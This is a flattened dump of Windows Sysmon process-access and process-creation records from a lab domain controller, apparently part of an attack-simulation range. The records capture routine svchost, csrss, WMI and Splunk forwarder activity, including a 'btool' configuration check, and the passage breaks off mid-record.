10341000x80000000000000002116Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.627{266CAFBE-6469-6064-0500-00000000AE01}624640C:\Windows\system32\csrss.exe{266CAFBE-647E-6064-4500-00000000AE01}3988C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002115Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.627{266CAFBE-647E-6064-3F00-00000000AE01}38403844C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{266CAFBE-647E-6064-4500-00000000AE01}3988C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+43bc6|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+6665|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+14738|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+d1d8|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002114Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.634{266CAFBE-647E-6064-4500-00000000AE01}3988C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c btool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{266CAFBE-647E-6064-3F00-00000000AE01}3840C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal_extra_splunkd_service_args 10341000x80000000000000002113Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.580{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002112Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.580{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002111Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.580{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002110Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.580{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002109Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.580{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002108Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.580{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002107Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.580{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002106Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.580{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002105Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.580{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002104Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.549{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002103Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.549{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002102Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.549{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002101Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.549{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002100Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.549{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002099Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.549{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002098Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.549{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002097Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.549{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002096Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.549{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002095Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.549{266CAFBE-646C-6064-1000-00000000AE01}11242508C:\Windows\system32\svchost.exe{266CAFBE-647E-6064-4400-00000000AE01}3944C:\Windows\system32\wbem\wmiprvse.exe0x101541C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+20fee|C:\Windows\system32\wbem\wmiprvsd.dll+2dbe|C:\Windows\system32\wbem\wmiprvsd.dll+155e9|C:\Windows\system32\wbem\wmiprvsd.dll+1498a|C:\Windows\system32\wbem\wmiprvsd.dll+146e6|C:\Windows\system32\wbem\wmiprvsd.dll+140fe|C:\Windows\system32\wbem\wmiprvsd.dll+fa1f|C:\Windows\system32\wbem\wmiprvsd.dll+1351d|C:\Windows\system32\wbem\wmiprvsd.dll+127f4|C:\Windows\system32\wbem\wbemcore.dll+ced2|C:\Windows\system32\wbem\wbemcore.dll+d531|C:\Windows\system32\wbem\wbemcore.dll+104fe|C:\Windows\system32\wbem\wbemcore.dll+25435|C:\Windows\system32\wbem\wbemcore.dll+24a9a|C:\Windows\system32\wbem\wbemcore.dll+2485e|C:\Windows\system32\wbem\wbemcore.dll+dc51|C:\Windows\system32\wbem\wbemcore.dll+2cfdf|C:\Windows\system32\wbem\wbemcore.dll+22adf|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+22711|C:\Windows\system32\wbem\wbemcore.dll+2d78c 10341000x80000000000000002094Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.533{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647E-6064-4400-00000000AE01}3944C:\Windows\system32\wbem\wmiprvse.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002093Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.533{266CAFBE-647E-6064-4200-00000000AE01}38923896C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{266CAFBE-647D-6064-2F00-00000000AE01}2796C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002092Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.518{266CAFBE-6469-6064-0500-00000000AE01}624740C:\Windows\system32\csrss.exe{266CAFBE-647E-6064-4400-00000000AE01}3944C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002091Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.518{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647E-6064-4400-00000000AE01}3944C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCR